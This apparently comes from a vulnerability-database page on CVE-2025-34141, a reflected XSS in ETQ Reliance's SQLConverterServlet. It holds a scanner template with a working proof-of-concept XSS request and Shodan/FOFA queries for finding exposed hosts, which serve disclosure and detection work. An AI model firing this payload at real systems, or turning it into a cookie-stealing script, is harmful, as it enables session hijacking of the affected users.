| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-34141 | 22 Jul 202512:35 | – | attackerkb | |
| CVE-2025-34141 | 23 Jul 202506:46 | – | circl | |
| ETQ Reliance CG 安全漏洞 | 22 Jul 202500:00 | – | cnnvd | |
| CVE-2025-34141 | 22 Jul 202512:35 | – | cve | |
| CVE-2025-34141 ETQ Reliance CG < SE.2025.1 Reflected XSS in `SQLConverterServlet` | 22 Jul 202512:35 | – | cvelist | |
| EUVD-2025-22314 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-34141 | 22 Jul 202513:15 | – | nvd | |
| PT-2025-30412 | 22 Jul 202500:00 | – | ptsecurity | |
| CVE-2025-34141 | 24 Jul 202513:30 | – | redhatcve | |
| ⚡ Weekly Recap — SharePoint Breach, Spyware, IoT Hijacks, DPRK Fraud, Crypto Drains and More | 28 Jul 202512:13 | – | thn |
id: CVE-2025-34141
info:
name: ETQ Reliance - Reflected XSS via SQLConverterServlet
author: slcyber,pdresearch
severity: medium
description: |
A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
impact: |
Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
remediation: |
Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-34141
- https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
classification:
epss-score: 0.01907
epss-percentile: 0.77269
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-34141
cwe-id: CWE-79
cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: etq
product: reliance
shodan-query: 'html:"ETQ Reliance"'
fofa-query: 'body="ETQ Reliance"'
tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev,vuln
flow: |
http(1)
if(template.path){
http(2)
} else {
set("path","reliance")
http(2)
}
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: header
internal: true
name: path
group: 1
regex:
- 'Location: https?://.*?/(.*?)/'
- raw:
- |
GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '</textarea><img src=x onerror=alert(document.domain)>'
- 'You have to start the ENGINE application before using this form.'
condition: and
# digest: 4b0a00483046022100b5b994ff937a69ce4cb09fa55e862114886a0ce61c00a3d18e05b2b48ca14e62022100ed2bec89b09305b24c713f6d1e752ebf47662f26a32cb82a98024ad327d0c1bc:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation